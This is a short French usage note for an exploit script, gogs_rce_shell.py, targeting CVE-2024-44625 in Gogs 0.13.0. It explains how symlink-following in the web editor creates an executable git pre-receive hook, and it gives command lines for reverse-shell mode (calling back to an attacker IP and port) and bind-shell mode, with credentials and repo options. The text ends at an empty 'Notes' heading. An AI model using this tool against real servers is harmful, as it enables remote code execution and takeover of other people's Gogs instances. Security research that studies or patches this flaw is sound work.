
Exploit pour CVE-2024-44625 dans Gogs 0.13.0, permettant l'exécution de code à distance via le suivi de lien symbolique pour créer un hook git, avec des modes shell inverse et shell lié.
Validé contre un Gogs de l'ère 0.13.0 derrière un proxy inverse. Primitive : le suivi de lien symbolique de l'éditeur web vers un fichier .git/hooks/pre-receive ABSENT crée ce fichier (exécutable). Chaque push ultérieur vers le dépôt l'exécute.
Utilisation :
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
--mode reverse --lhost <YOUR_IP> --lport 4444
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
--mode bind --bind-port 5555
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
--mode reverse --lhost IP --lport 4444 --repo <name> --reuse --triggers 3
Notes :